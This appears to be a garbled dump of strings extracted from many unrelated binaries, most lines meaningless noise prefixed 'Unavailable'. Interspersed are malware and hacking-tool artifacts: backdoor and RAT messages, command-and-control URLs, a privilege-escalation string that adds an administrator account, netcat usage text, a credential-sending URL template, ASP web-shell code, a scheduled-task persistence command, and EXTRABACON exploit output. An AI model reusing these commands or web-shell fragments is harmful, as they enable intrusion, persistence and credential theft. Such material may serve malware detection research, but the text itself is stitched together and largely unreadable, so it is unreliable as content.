Unavailable 7'\z
Unavailable mp2bo
Unavailable msk8x
Unavailable rgi,a>
Unavailable "00dc
Unavailable t$`+
Unavailable |z+*
Unavailable 5 db
Unavailable outlook.exeproblem %s report %sipm.noteip..ip..taskip..stickynoteip..journalip..contactip..appointmentip..imapsysteminfo /fo tabletasklist /vipconfig /allcontent-type: jpegmicrosoft dh schannel cryptographic providerno data%d setime success.m
Unavailable 3\}(
Unavailable `template-parameter
Unavailable ">}t
Unavailable }fr]
Unavailable d$8d
Unavailable 00dc^
Unavailable tsvi
Unavailable qtzv
Unavailable r7f;\$l
Unavailable l$@i
Unavailable setfilepointerex
Unavailable l|9bxb
Unavailable delete[]
Unavailable e+kn
Unavailable .epe: encryptpe v2.2006.1.15h'
Unavailable mqk
Unavailable -_8eu
Unavailable previous command: set injection processes (status=0x%x)secondary injection process is <null> [no secondary process will be used]enter the address to be used as the spoofed ip source address (xxx.xxx.xxx.xxx) -> e: execute a command on the implantfullthreaddump.classthreadmonitor.classdeadlock$deadlockthread.class*
Unavailable }.ap
Unavailable p[\n
Unavailable fb:c++hook
Unavailable dj{w(
Unavailable ?j;.
Unavailable \o#t
Unavailable rrhc
Unavailable qoq}
Unavailable error2can't find [%s]!check the file name and try again!open [%s] error! %dthe size of [%s] is zero!createthread downloadfile[%s] error!uploadfile [%s] error:connect server failed!receive [%s] error(recved[%d] != send[%d])!receive [%s] ok! use %2.2f seconds, average speed %2.2f k/screatethread uploadfile[%s] error!ready download [%s] ok!get controlinfo from fileclient error!fileclient has a error!virtualalloc sendbuff error(%d)readfile [%s] error(%d)...readfile [%s] data[readed(%d) != filesize(%d)] error...recvdata myrecv_info size error!recvdata myrecv_info tag error!senddata szcontrolinfo_1 error!senddata szcontrolinfo_3 error!virtualalloc recvbuff error(%d)recvdata error!writefile [%s} error(%d)...systemversion: %sproduct id: %sinstallpath: %sinstalltime: %d-%d-%d, %02d:%02d:%02dresgistergroup: %sregisteruser: %scomputername: %swindowsdirectory: %ssystem directory: %snumber of processors: %dcpu[%d]: %s: %smhzram: %dmb total, %dmb free.displaymode: %d x %d, %dhz, %dbituptime: %d days %02u:%02u:%02u\
Unavailable rct{+
Unavailable &o/0%v
Unavailable const
Unavailable (fwz
Unavailable ,v,k_
Unavailable pc b!
Unavailable ;z_s
Unavailable 0dd
Unavailable h|cc
Unavailable k\8z
Unavailable l1ib
Unavailable 54b@
Unavailable h,cd
Unavailable mqtkj5
Unavailable [yqs
Unavailable exehack</title>copyright &copy; 2006-2009 cr by
Unavailable ;\ws
Unavailable )v*-
Unavailable *e&i
Unavailable f1.l
Unavailable -0jhk-=
Unavailable ?gc00dc&
Unavailable +d<!$
Unavailable s%}gx
Unavailable !i$>
Unavailable x313
Unavailable o%"q
Unavailable 363<3s3c3l3q3v3{33!3%3)3-3135393@5
Unavailable -------- e-mail: zalexf@hotmail.ru ---------
Unavailable smrk
Unavailable somv`
Unavailable safengine shielden `
Unavailable m7h3
Unavailable t";s
Unavailable :nn/
Unavailable na2#
Unavailable cj[^p*
Unavailable hsi1
Unavailable wz!/
Unavailable sqrt
Unavailable z06}\
Unavailable phonebook
Unavailable }609
Unavailable iomus.dll
Unavailable xvf1(
Unavailable %9n;jpfz-
Unavailable l$8l
Unavailable jb[6
Unavailable stonehead's mess v1.07
Unavailable b,ho
Unavailable 8_^][
Unavailable l=ni
Unavailable interplay mve file
Unavailable femh
Unavailable oap.,
Unavailable mozj4
Unavailable -=[ hidepe by bgcorp ]=-fws
Unavailable ydyyvv
Unavailable x_id: x_os: x_bv: initializesecuritydescriptormozilla/4.0 (compatible; msie 7.0; windows nt 5.1; sv1)usage: -[start|stop|install|uninstall\\system32\\sc.exe config lanmanworkstationmcfmisvclsremoraservpwfgdumpfgexecfgexecpipeosql\\srcosqluserosqlpasswordosqlservercmd /c net start %s%add%kartoxaa
Unavailable rqcc
Unavailable a<zdjz;]h
Unavailable o$&9
Unavailable embedding
Unavailable }!kn|
Unavailable s`a{
Unavailable smwda
Unavailable bgi stroked font v1.1p
Unavailable u:d+
Unavailable {\sy`#
Unavailable d$"g
Unavailable ihig
Unavailable xo1r
Unavailable fd94pt
Unavailable iqh\
Unavailable k}0"
Unavailable mfr5
Unavailable areas
Unavailable 8at:
Unavailable (qnb?
Unavailable nts@
Unavailable - orien executable files protection system -
Unavailable t$pwr
Unavailable j&$[
Unavailable tx0[<
Unavailable sioqerr
Unavailable &d#3b;ud
Unavailable ur~t
Unavailable "x9^9
Unavailable oc0{
Unavailable %'<fi
Unavailable get
Unavailable /8b.
Unavailable ~{,+&w
Unavailable yx`3
Unavailable ,v7k
Unavailable b~jn)
Unavailable 2so"
Unavailable v)57gz@*35w
Unavailable asin
Unavailable upq8
Unavailable g}&s
Unavailable f=q
Unavailable (p,d0y
Unavailable ih[p
Unavailable kelloworld.dllk
Unavailable >02s
Unavailable o<e]
Unavailable f[`h
Unavailable ,kzxi
Unavailable jzul*k
Unavailable 8f[bu
Unavailable -hj7j
Unavailable 0tvgq
Unavailable )ka}
Unavailable getcommandlinea
Unavailable 1d=01wb
Unavailable vh:k
Unavailable %zf2j]=
Unavailable ll-text index
Unavailable w:zs
Unavailable uk^.\u
Unavailable ual$
Unavailable 8oxe
Unavailable app.stream-media.netfile %s does'nt exist or is forbidden to acess!getprocessaddresss of phttpqueryinfoa failed!connect %s error!download file %s successfully!index.tmpexecute pe successfullyaa/22/success.xmlaa/22/index.aspfile %s a non-pe filesendrequset error!filelist[%d]=%shttp://update.konamidata.com/test/zl/sophos/td/result/rz.dat?http://update.konamidata.com/test/zl/sophos/td/index.dat?internet connect error:%dproxy-authorization:basichttpqueryinfo failed:%dread file error:%ddowndll.dllinvalid urlcreate file failedmyagent%s%s%d%davaliable data:%u bytesthe procedure entry point %s could not be located in the dynamic link library %spsapi.dllwinhttpgetproxyforurlw
Unavailable l04*|
Unavailable pppp
Unavailable y d_
Unavailable txdb
Unavailable axna
Unavailable 3 x"q
Unavailable gq&-
Unavailable )q,=
Unavailable qqqqsv
Unavailable dllaspxspyiis spyprotected void dgcow(object sender,eventargs e)openmydoorinstall service errorstart remove servicendisversionunable to alloc the adapter!wait for master fuckxx.exe <host> <port>chkroot2007door is bind on %smicrosoft.exchange.clients.auth.dlldllshellexc2010users\\ljw\\documentsplease input pathauth.owa\\dnstunclient\\\\t-dnstunnel\\xssok.blogspotdnstunclientbecause of error, can not analysiscan not deal witn the errorthe other retun one rstcoversation produce one errorprogram try to use the have deleted the bufferefh3 [hex] [srcfile] [dstfile]123.exe 123.efhencoder: b[i]: = (luid error)users\\k8team\\desktop\\getpassworddebug x64\\getpassword.pdbgetuserinfo usernamejoe@joeware.netif . specified for userid,game over good luck by windreleicenamejingtisanmenxiachuanxiao.vbswinds updategtalklite.comcomputer=%s&lanip=%s&uid=%s&os=%s&data=%sd13idmadmerror: peeknamedpipe failed with %i.dllut.exeut.urlutlisten socket error.wsaasyncselect socket error.new socketinfo error!http/1.1 403 forbiddencreate socket error.this service can't be stoped.provides support for media palyercreaetprocess error%4.2f gbdos emluator ver\\pipe\\fastdosfastdos.cppfail,error code = %d.safeproxy htservertimer quit!useage: %s pid%s port[%d] to port[%d] success!p0: port for listener\\users\\whg\\desktop\\plug\\[+y] cwnd : %3d, fligth:\\unitfrmmanagerkeylog.pas\\unitfrmmanagerregister.pasinput name...new value#tthreadrcontrol.execute seh!!!\\unitfrmrcontrol.pasonsocket(event is error)!make 3f version ok!!!pelease do not change the docamentpress [ok] continue run, press [cancel] exitfail to load lsasrvuser principalring rat exception(can not update server recently)!sucess!user canceled!temp result file , change it to where you likeby. twi1ight[both mode] ,delay time to read resultsuch as nc.exe or trojan+++shell mode+++win2008 fso has no privilege to delete filednstunclient -d or -domain <domain>dnstunclient -ip <server ip address>c:\\windows\\system32\\cmd.exe /c schtasks /create /tn \"\\microsoft\\windows\\pla\\system\\microsoft windows\" /tr c:\\windows\\system32\\cmd.exe /c schtasks /create /tn \"microsoft windows\" /tr taskkill /im conime.exe\\dns control\\t-dnstunnel\\dnstunclient\\dnstunclient.cppudp error:can not bing the port(if there is unclosed the bind process?)use error domain,set domain pls use -d or -domain mark(current: %s,recv %s)error: packet num error.the connection have condurt,pls try latercoversation produce one error:%s,coversation failtry to add many same pipe to select group(or mark is too easy).a
Unavailable ~v<q
Unavailable }u!=
Unavailable xj4d
Unavailable 2.1]`
Unavailable d&h.
Unavailable a)'k
Unavailable y*tv
Unavailable ;1xi
Unavailable \$hd
Unavailable )dp^
Unavailable ufm9/ta
Unavailable ml=f
Unavailable o_jvj
Unavailable ?\nth
Unavailable hs[n
Unavailable 9zpe
Unavailable 9`bf
Unavailable download excuteencryptorfunctionpointer %d%s\\%s.lnkmac:%s-cpu:%s-hd:%sfeed back responce of hostget token at hostdwn md5 err\
Unavailable "(/t*
Unavailable %8 @
Unavailable cookies[\"zwiz\"]indexof(\"es-dn\")[\"keep-alive\"] == \"320\"pk
Unavailable clxzt/
Unavailable <of4`
Unavailable |$0-
Unavailable d$8e3
Unavailable m2pcu
Unavailable millisecsauthenticatenetuseipcfailed to authenticate tofailed to disconnect from%
Unavailable get_currentdomainabccbaspygateratabccbastubx.pdbmonikerstringvirustotal1s
Unavailable `.zylmi
Unavailable v{!-
Unavailable hjrchive
Unavailable ;l)f
Unavailable ole32.dll
Unavailable a4lc
Unavailable pa^_]
Unavailable &j0\v
Unavailable www.micro1.zyns.commozilla/4.0 (compatible; msie 8.0; win32)m
Unavailable 0a_a^_
Unavailable 7bhh
Unavailable 8]0d
Unavailable jz"/r
Unavailable xpj*e-
Unavailable l$de3
Unavailable q7e,
Unavailable c8<(u
Unavailable expr-v.1.2.u
Unavailable 0}k)gf
Unavailable cp.!
Unavailable :lip
Unavailable w!+'i
Unavailable k~je#>!
Unavailable \nuname -a\n\n/dev/shm/.x11.idlxmain64# \\u@\\h:\\w \\$ 0
Unavailable ciq|d
Unavailable id: 0x%xname: %scmd.exe /c for /l %%i in (1,1,%d) do if exist& systeminfo) else exitd
Unavailable c:el
Unavailable alo,x
Unavailable wscript.sleep 5000set fso = createobject(\"scripting.filesystemobject\")if(fso.fileexists(\"then fso.deletefile(\".\\/result?hl=en&id=%s
Unavailable $bpv(
Unavailable li;;<
Unavailable o2e%
Unavailable mh~f
Unavailable nfclient.dllrundllinstallarundlluninstalla/4.0 (compatible; msie 6.0; windows nt 5.1; sv1)/5.0 (compatible; msie 7.0;windows nt 5.1)1234567890123456\x00abcdefghijklmnopqrstuvwxyzabcdefghijklmnopqrstuvwxyz0123456789+/\x00you specify service name not in svchost
Unavailable hkcufhtihsd
Unavailable dvsd
Unavailable accept-ranges: bytes
Unavailable xxxx
Unavailable 0`-g
Unavailable ~a{?!
Unavailable g&js]
Unavailable ~=rt
Unavailable the value of esp was not properly saved across a function call. this is usually a result of calling a function declared with one calling convention with a function pointer declared with a different calling convention.
Unavailable frfz
Unavailable l$ wavawh
Unavailable \$ha
Unavailable [8ad
Unavailable @v8rw
Unavailable akur
Unavailable 3o*u
Unavailable /j.ls
Unavailable khrome crypt
Unavailable createstreamonhglobal
Unavailable zd(@0
Unavailable dvz!
Unavailable %xuy
Unavailable \uj:
Unavailable %zjr
Unavailable uk/m
Unavailable s(u2
Unavailable !=ilt
Unavailable invalid password hash: %s-= mysql hash cracker =- usage: %s hashhash: %08lx%08lxfound pass: pass not foundt
Unavailable f-a01wb
Unavailable avyo{bs
Unavailable t$ 3
Unavailable &sre
Unavailable u9sd
Unavailable [d)fj
Unavailable s:wk
Unavailable %.*
Unavailable *4go
Unavailable httpqueryinfoa
Unavailable char c = (i & 0xff);
Unavailable aaaa
Unavailable p\g3"
Unavailable j),!
Unavailable nv24
Unavailable registered to :
Unavailable x_^[d
Unavailable #%(v
Unavailable `dak
Unavailable hz1@
Unavailable gettimeformatw
Unavailable 'a6x
Unavailable fopen
Unavailable j/y(
Unavailable #n(p
Unavailable t9f;
Unavailable t1y943jihk09lkjdsmygamehavethisisasupernewgamenowbeginthis324newgameisapi_connectbd_sockbd_dnspcc_sockpcc_proxypcc_webproxy?hl=en&q=%s&meta=?hl=en&meta=miragefox_server.pdbavctest_gagaapp
Unavailable r!sctz
Unavailable }owm
Unavailable w7(
Unavailable ;2,"1
Unavailable &(g
Unavailable ]\g3
Unavailable r}lb
Unavailable pgs~
Unavailable ;jpc{
Unavailable j>v{`
Unavailable wdpf
Unavailable k"f!3
Unavailable *q=/gw
Unavailable `j@h
Unavailable '1u4
Unavailable qfgp
Unavailable f9)u h
Unavailable nf400z
Unavailable wu&s
Unavailable @rprr
Unavailable %33333
Unavailable fz2{
Unavailable gr>{
Unavailable ,ybpd<
Unavailable ugh95
Unavailable getlastactivepopup
Unavailable gj_v
Unavailable password <=14/%ldn.txtkill you\x00d
Unavailable d$@h;
Unavailable \s2%?
Unavailable yp~(
Unavailable w8m +
Unavailable $!8(
Unavailable (polyscrypt
Unavailable ihhc
Unavailable ;j9,xz
Unavailable 3voa
Unavailable #0;u`
Unavailable =8ts
Unavailable 43wl
Unavailable [thunk]:
Unavailable o $a
Unavailable smb share enumerator and admin finder hunt only runs on windows nt...user = %sadmin is %s\\%serror!!! bad host lookup. program terminate.error no.2!!! program terminate.local host name: %spacked by exe32pack 1.38local computer name: %slocal ip adress: %sarttrayhookdll.dll?terminatehook@@yaxxzs
Unavailable 9s,t
Unavailable >/%
Unavailable *xj')
Unavailable va2#
Unavailable 3}'b
Unavailable &+@_
Unavailable p216
Unavailable bxh{q
Unavailable jtbe
Unavailable not enough memory$-
Unavailable 956#bh"
Unavailable 9q$i
Unavailable *oj,
Unavailable n`aa
Unavailable y(k4
Unavailable a^a]a\
Unavailable 00dcm
Unavailable & \#
Unavailable 78*qw
Unavailable 2r+r6
Unavailable d&&@
Unavailable %'=w
Unavailable o[<v
Unavailable ?uih
Unavailable (t$0a
Unavailable o~[63
Unavailable l{hq
Unavailable @88t
Unavailable edv8e>xd
Unavailable gpvp
Unavailable h+nd
Unavailable !satana!%s-tryexceptd:\lbetwmwy\uijeuqplfwub.pdbqfntvthbnow it's %i:%m%p.
Unavailable http://www.jmicron.co.tw0suckm3 from explorer.exe moth4fucka #@!\
Unavailable ]ksw
Unavailable j5"zwo
Unavailable [gk*
Unavailable r0vyh
Unavailable !,tz/
Unavailable @=%s
Unavailable k0@h
Unavailable g(fuf]a`a
Unavailable jzxt
Unavailable 2r>a
Unavailable a]c'
Unavailable c_(`
Unavailable >77:
Unavailable iza{|t);|
Unavailable tdlcc
Unavailable toyotpipe
Unavailable camdd
Unavailable 2*:n
Unavailable #fl[(
Unavailable @n,00dc
Unavailable bots\\bot5\\x64\\releasebot5\\release\\ism.pdbbot\\release\\ism.pdb\\bot fresh\\release\\bot/
Unavailable \$83
Unavailable b`a#
Unavailable nnkm
Unavailable .&z&
Unavailable d$,wp
Unavailable i[,b
Unavailable `eh vector copy constructor iterator'
Unavailable d$ph
Unavailable fj'w
Unavailable !ks}
Unavailable t$lf;
Unavailable %sg+
Unavailable (=?t
Unavailable 1+se
Unavailable tnhc
Unavailable w!5*?
Unavailable y)6`b
Unavailable `=lw
Unavailable z'mo
Unavailable &n5/
Unavailable @j@h0
Unavailable 4y9f
Unavailable f7l^
Unavailable jxj@
Unavailable yh.qx
Unavailable mgbf
Unavailable c3t#
Unavailable setthreadstackguarantee
Unavailable @.rsrc
Unavailable r'rr
Unavailable p;cd
Unavailable }+)!
Unavailable ffffff
Unavailable o0#v
Unavailable 2bxf
Unavailable fb9,nu
Unavailable `xmu;?
Unavailable ;=ds
Unavailable p9{a
Unavailable pec2
Unavailable fd9;u
Unavailable x<lp\ln
Unavailable c30m
Unavailable med)
Unavailable p]{8
Unavailable e!v`
Unavailable ;s?2
Unavailable (trivial173 by smt/smf)
Unavailable =, @
Unavailable l[f*
Unavailable ^j9]
Unavailable 'ybn
Unavailable t$8d
Unavailable d$ |
Unavailable volatile
Unavailable iavs
Unavailable a>noh
Unavailable 1a;m
Unavailable ug=z
Unavailable 00dck
Unavailable krvp
Unavailable ;m<e
Unavailable ,uw\
Unavailable c:\\documents and settings\\administrator\\got wmi process pid: %dthis exploit will executerunning reverse shell<description>chken qq:41901298</description>version=\"9.9.9.9\"name=\"ch.ken.tool\"to host!ss.exelstrlen0rtlunwnc -l -p port [options] [hostname] [port]invalid connection to [%s] from %s [%s] %dpost-rcv getsockname failedfailed to execute shell, error = %sudp listen needs -p arghttp://www.site.com/test.dll?user=%username&pass=%passwordusername: \"%s\", password: \"%s\", remarks: \"%s\"user:\"%s\" pass: \"%s\" result=\"%s\"mozilla/4.0 (compatible; msie 4.01; windows nt)l
Unavailable d82u&h
Unavailable allocation number within this function:
Unavailable cq!&
Unavailable rar!frombase64stringulti.exer
Unavailable o+ul
Unavailable ;^!u
Unavailable s|yv
Unavailable ?`ybv
Unavailable m?{n6
Unavailable %\0@
Unavailable realpath
Unavailable i:pw
Unavailable .^r2
Unavailable t$ l
Unavailable addfontmemresourceexnamedescapecreatebitmapdeleteobject
Unavailable |l3x
Unavailable d$(h
Unavailable +a74b$
Unavailable .aq%h
Unavailable portions copyright (c) 1997-1999 lee hasiuk
Unavailable `vector vbase constructor iterator'
Unavailable ]y[e
Unavailable mp>r,
Unavailable haoq@neusoft.comqq2000b.exe\\qq2000b.exew
Unavailable @0.1`ha
Unavailable gif8this program cannot be run in dos modethis program must be run under win32userform1textbox1microsoft forms 2.0ret.logmicrosoft internet explorer 6.0szurl failszurl successfully%s&sdate=%04ld-%02ld-%02ldsuperhard corp.microsoft corp.[insert][delete][end]!(*@)(!@key!(*@)(!@sid=services\\riodrv32riodrv32.syswuauserv.dllarp.exeprojects\\aurigaend binary outputxriteprocessmemoryie:password-protected siteszxdosmlget user name error!get computer name error!----client system info----stfilecmd success!*qd9kdgba33*%wkda0qd3kvn$*&><(*&%$e#%$#1234asdgknag@!gy565dtfbasdgidr_data%dasdfqwe123cxzmode must be 0(encrypt) or 1(decrypt).new_connection_to_bounce():usage:%s ip port [proxip] [port] [key]downrun success%s@gmail.com<!--%s-->w4qkihsb+so=poqkigy7ggh+vcnqntcmhfco9w==8oqkiqb5880/ujlzasy=mozilla4.0 (compatible; msie 7.0; win32)mozilla5.1 (compatible; msie 8.0; win32)getfileputfile---[ virtual shell]---not comming from our server %s.mozilla/4.0 (compatible; msie 7.0;)kilfailkilsuccpkkillpklistkill process success!kill process failed!sleep success!based on glooxglooxtest.pdb
Unavailable ;mzu7
Unavailable ehkq
Unavailable wd.`_
Unavailable xshareware-version exestealth, contact support@webtoolmaster.com - www.webtoolmaster.com
Unavailable )t$@
Unavailable sbbr
Unavailable @$@k
Unavailable g3}hd6zf
Unavailable l$(a
Unavailable z/g>
Unavailable h\:q:
Unavailable @v_;)
Unavailable [ci<?
Unavailable !lzb']
Unavailable `u*z
Unavailable 5$f@
Unavailable !`xn
Unavailable =~;wk
Unavailable getvolumeinformationa
Unavailable monday
Unavailable j6)\q
Unavailable k^1"*
Unavailable j,ry
Unavailable !zka
Unavailable '(
Unavailable x/'[x
Unavailable 6gtk
Unavailable 9b3y$c
Unavailable c:\windows\softwareprotector\
Unavailable powered by smartassembly 6u
Unavailable 7exl
Unavailable d$\h
Unavailable g_ru
Unavailable %s%s%p%s%zd%s%d%s
Unavailable qh\ @
Unavailable d8l2
Unavailable 3dmark database file`ht
Unavailable st1h
Unavailable loadresource
Unavailable 4=ep}mbl
Unavailable -h~ze"
Unavailable xntdeviceiocontrolfilentdll.dllmswsock.dllc:\\pj\\testing\\testing\\release\\whatthefuckingisgoingonhiman!kingisgoingonhiman!x
Unavailable tf7`p
Unavailable |$0a
Unavailable "(&e
Unavailable (d$ h
Unavailable the ordinal %u could not be located in the dynamic link library %sgetmodulehandleaodbc32.dlle
Unavailable rh:lmp?r
Unavailable yl`%
Unavailable g_tv
Unavailable 7.t?i
Unavailable rq*m
Unavailable /spo
Unavailable \nb4_tmp_0132454350\
Unavailable call extract(dnsps1, wss.expandenvironmentstrings(\"%public%\") & \"\\libraries\\dns.ps1\")2
Unavailable h31415927tttts
Unavailable library/preferences/com.applemehrdadu
Unavailable drol
Unavailable pw(np
Unavailable tc!r
Unavailable jm0u
Unavailable et^,
Unavailable u(@u/_
Unavailable (00dc[
Unavailable t$@;
Unavailable ^)"t
Unavailable bvsdr)
Unavailable h\w@
Unavailable axr>k"
Unavailable bdgd
Unavailable \(\+
Unavailable p7!4.#
Unavailable pb-0b9&
Unavailable xyzcmd v1.0 for nt s= click here if you want to get your registered copy of aspack; for beginning of translate - copy english.ini into the yourlanguage.inie-mail: shinlan@km169.net; please, translate text only after simbol '='= compress with aspackresponse.write \"<a href='index.asp'>if request.cookies(\"password\")=\"whichdir=server.mappath(request(\"path\"))set fs = createobject(\"scripting.filesystemobject\")whichdir=request(\"path\")hit [enter] to begin command mode...if you are in command mode,[/l] lists all the drives the monitor is currently attached tof
Unavailable ylz#
Unavailable mx=g
Unavailable {f!l
Unavailable char32_t
Unavailable =x;|
Unavailable em,1
Unavailable 30.40.50.60:9342|###[ snmpresponse ]###[+] generating exploit for exec mode pass-disable[+] building payload for mode pass-disable[+] executing: extrabaconappended aaaadminauth_enable payload/bananaglee/eligiblebombprotocol must be either http or https (ex: https://1.2.3.4:1234)
Unavailable )>+'j:
Unavailable <b~n
Unavailable 0*b)tr
Unavailable .00dc$
Unavailable v#xq
Unavailable fatalexitisc`
Unavailable )kkm
Unavailable "kqh^1-
Unavailable i/r zb
Unavailable n<k3v
Unavailable uh`d@
Unavailable ud>8
Unavailable %h0@
Unavailable `.rdata
Unavailable i;}m,
Unavailable !this program cannot be run in dos mode.
Unavailable expandenvironmentstringsw
Unavailable cklz
Unavailable 3o2c
Unavailable m^#q
Unavailable -)4d
Unavailable evf
Unavailable lzu9
Unavailable cipe
Unavailable d$(p
Unavailable virtualquery
Unavailable bh7(
Unavailable +|$(
Unavailable xd8py
Unavailable u+e3
Unavailable ]c+e
Unavailable uwavh
Unavailable e:i\
Unavailable `h````
Unavailable bdc helpsystemh
Unavailable @iz{
Unavailable fa9<\u
Unavailable gslzg
Unavailable -->got wmi process pid: %d this exploit will execute \"net user net user temp 123456 /add & net localgroup administrators temp /addrunning command with system token...thread impersonating, got network service token: 0x%xfound system token 0x%xthread not impersonating, looking for another thread...p
Unavailable ri}$^
Unavailable l2gn
Unavailable tlem
Unavailable cofx
Unavailable f[<lb
Unavailable z@1:
Unavailable whu:
Unavailable wr\(
Unavailable a95bl765mng2gprsh
Unavailable j(#/
Unavailable g@hp
Unavailable vwauh
Unavailable m7{[
Unavailable 3apq
Unavailable -------------
Unavailable clpl
Unavailable b+r/
Unavailable w{&2z
Unavailable .>jtt
Unavailable vn8_
Unavailable .[-2
Unavailable enumsystemlocalesex
Unavailable 9dff
Unavailable a6x3|
Unavailable 0<rn
Unavailable exitprocess
Unavailable c"i0
Unavailable =,,&
Unavailable d$h9d$ s"
Unavailable tcpt7file`
Unavailable xvdj
Unavailable asqrvwu
Unavailable i-v*
Unavailable mrih
Unavailable zokn
Unavailable startwork
Unavailable willweiwei
Unavailable znuu
Unavailable n+$
Unavailable y)fd
Unavailable tvf9p
Unavailable #@ca
Unavailable lo%u
Unavailable r*\kmwmbk lg@r
Unavailable wxlt
Unavailable p@h~
Unavailable :3ty
Unavailable lvw3
Unavailable qb^8u
Unavailable <1~-<3~ <4t5<5t
Unavailable %s\\rundll32.exe \"%s\", shadowplaynvdisps.dll%snvdisps.dll\\winhlp32.exenvdisps_user.dat%snvdisps_user.datprogramdata\\rastls\\rastls.exeprogramdata\\rastls\\rundll32.exeprogramdata\\rastls\\svchost.exewindows\\system32\\regsvr32.exe4689windows\\system32\\mshta.exewindows\\system32\\windowspowershell\\v1.0\\powershell.exewindows\\system32\\wbem\\wmiprvse.exe%s=?getname&computer=^xjwfwcgrhdgelaa=jvdjtkrjuibtcplugpsexec.exewindows\\system32\\net.exewindows\\system32\\at.exeinvalid key length used to initialize blowfish.getpcproxyhandlerstartpcproxysetpcproxyhandler
Unavailable 1pmg
Unavailable stfo
Unavailable gk85
Unavailable this application cannot run with an active debugger in memory.
Unavailable d0r+z
Unavailable wq-@
Unavailable |$ i
Unavailable 0richwservice control manager_vsnwprintfroot agencyroot agency0startservicectrldispatchera\
Unavailable 1#snan
Unavailable nc/{^
Unavailable f:\\excalibur\\excalibur\\excalibur\\bin\\osabersvc.pdbcmd.exe /c md h
Unavailable ^j,0
Unavailable h|rc
Unavailable ddedata initialized (unicode), app strings are '%s' and '%s'
Unavailable wrong protocol type/post/download/post/echoj
Unavailable win7elevatev2\\x64\\release\\r
Unavailable ;;;i
Unavailable :qtiger324{user32.dlllogin.aspcheck.aspresult.aspupload.asp
Unavailable fjn9
Unavailable rtlunwindex
Unavailable |2b3
Unavailable wzre
Unavailable ##\\darkeyev3-suvw
Unavailable +m<7>
Unavailable xj9h
Unavailable t'h;
Unavailable {v6u
Unavailable 9r84
Unavailable ilbmbmhd
Unavailable noobyprotect se 1.2.0.0dt=
Unavailable sgrj
Unavailable dmt3
Unavailable vbeaf.drv
Unavailable d]jkj8
Unavailable i01wb
Unavailable vyds
Unavailable gt{3
Unavailable b#5
Unavailable _autoattackmain_frmiptoaddr!win32 .exe.xolehlp.dlldtcgettransactionmanagerexagetusernameapacketsendpacketarpsniffpcap_loopsyntax: %s [-i file] [-o file] [-m minlen] [-m maxlen] [-c minsets] -l -u -n -p pw-inspectori:o:m:m:c:lunpsp
Unavailable )t00dc
Unavailable 2ed3,e%
Unavailable vwukh
Unavailable @mr
Unavailable w`qy(y
Unavailable t$4vr
Unavailable *mlt* = %*ip* = %*victimo* = %*name* = %[start][data]we control your digital worldrc4initializerc4decrypts
Unavailable hok!,i
Unavailable l;||
Unavailable a0kh
Unavailable support@nirsoft.net0</requestedprivileges></security></trustinfo></assembly>pass,config,n{)phmysqlz\\dhlp\\.\\dhlp\\.shautocomplemainframek
Unavailable sqrvwu
Unavailable r1.1.4
Unavailable 101wb
Unavailable h}w>
Unavailable fmc!`
Unavailable wt;vh
Unavailable h{9.v
Unavailable |:xxc
Unavailable 5bv%
Unavailable |md$@7
Unavailable !m3a
Unavailable iky*h
Unavailable _rx_
Unavailable sckuh
Unavailable omtlq
Unavailable l$pa
Unavailable uwhc
Unavailable compiled by: berotinypascal - (c) copyright 2006, benjamin 'bero' rosseaux sqv
Unavailable #c2 3
Unavailable ^p4j
Unavailable s 01wb
Unavailable t"<.u
Unavailable wmgp
Unavailable i+z@
Unavailable .~ny
Unavailable ?*u:h
Unavailable 9keg
Unavailable ?$g4
Unavailable f"!,=
Unavailable "uhy>"
Unavailable !4hh
Unavailable m3n3gatt1hack3rc
Unavailable e(hc
Unavailable ~t.9
Unavailable q{uk$
Unavailable okm9
Unavailable dispatchcommanddispatchevent^
Unavailable jmp0
Unavailable gf?.
Unavailable $yqd
Unavailable <trustinfo xmlnssrtwd@@515]5z5c
Unavailable p#f"g7
Unavailable #t53
Unavailable 8@tkh
Unavailable k6d!
Unavailable ,0b*
Unavailable hx @
Unavailable isprocessorfeaturepresent
Unavailable abcdefghijktornewforusomething illeagalrundll32 %s,rundlluninstalle
Unavailable g\#qy
Unavailable __thiscall
Unavailable lbcr
Unavailable t3qx
Unavailable ;asl
Unavailable p\cs
Unavailable -?qg
Unavailable %w@>
Unavailable e=^\6+4f+
Unavailable =l#itwx
Unavailable _>0=
Unavailable ntkatky
Unavailable 2ole32.dlll
Unavailable pcrypt
Unavailable `svw
Unavailable 9i01wb
Unavailable gi43
Unavailable t)c+
Unavailable qgy@a
Unavailable gu=_
Unavailable 6@w@1
Unavailable ^kuw
Unavailable wwwww
Unavailable <v0h
Unavailable ;%yr_{
Unavailable iih 8
Unavailable &79z
Unavailable setstdhandle
Unavailable rpx 1.obfuscated with dotfuscatorthis is a compiled autoit script. av researchers please email avsupport@autoitscript.com for support.tagg
Unavailable wqdw
Unavailable 28zy
Unavailable wqu3amjng
Unavailable to px
Unavailable <58'
Unavailable l$<pj
Unavailable -jcv
Unavailable <trustinfo xmlns="urn:schemas-microsoft-com:asm.v3">
Unavailable _ud(!
Unavailable agoz
Unavailable ~27x/4v+
Unavailable 5uqpwx,wp500
Unavailable ~tr2
Unavailable gp&pe
Unavailable n3xp
Unavailable ik\j
Unavailable http://www.vip80000.com/hot/index.htmlgetconnectstringcncert.safe.ssclone.dll(*.jpg;*.bmp;*.gif;*.ico;*.cur)|*.jpg;*.bmp;*.gif;*.ico;*.cur|jpgklock.dlle
Unavailable 6vov
Unavailable -'mb
Unavailable `m+x
Unavailable xe&h_=ry
Unavailable azfyk
Unavailable x$('n:
Unavailable l$0h3
Unavailable uh/$
Unavailable :-<&
Unavailable neolite executable file compressorie686@sohu.comsplitjoin.exesplitjoin<meta http-equiv=\"content-type\" content=\"text/html;charset=gb_2312-80\">set thisfile = fs.getfile(whichfile)if request.cookies(\"password\")=\"juchen\" then set thisfile = fs.opentextfile(whichfile, 1, false)color: rgb(255,0,0); text-decoration: underline }if request(\"creat\")<>\"yes\" then<form name=\"formpst\" method=\"post\" action=\"entice.asp\">if left(trim(request(\"sqllanguage\")),6)=\"select\" thenconndb.execute(sqllanguage)<!--#include file=sqlconn.asp-->rstsql=\"select * from \"&rstable(\"table_name\") -s - outbound connection source port numberfpipeto open registryi love candy very much!!ginadllh
Unavailable fmb!~
Unavailable i4h3;`
Unavailable vzvn:b?
Unavailable e o*c
Unavailable "p<m
Unavailable {3nj
Unavailable 9`^i
Unavailable /?10
Unavailable "zf)
Unavailable q0_l
Unavailable m5y>
Unavailable tuvz
Unavailable 62i01wb
Unavailable vg71*
Unavailable {ap\t
Unavailable st^;
Unavailable \>gdr
Unavailable h264
Unavailable 5`rk
Unavailable ~hi+
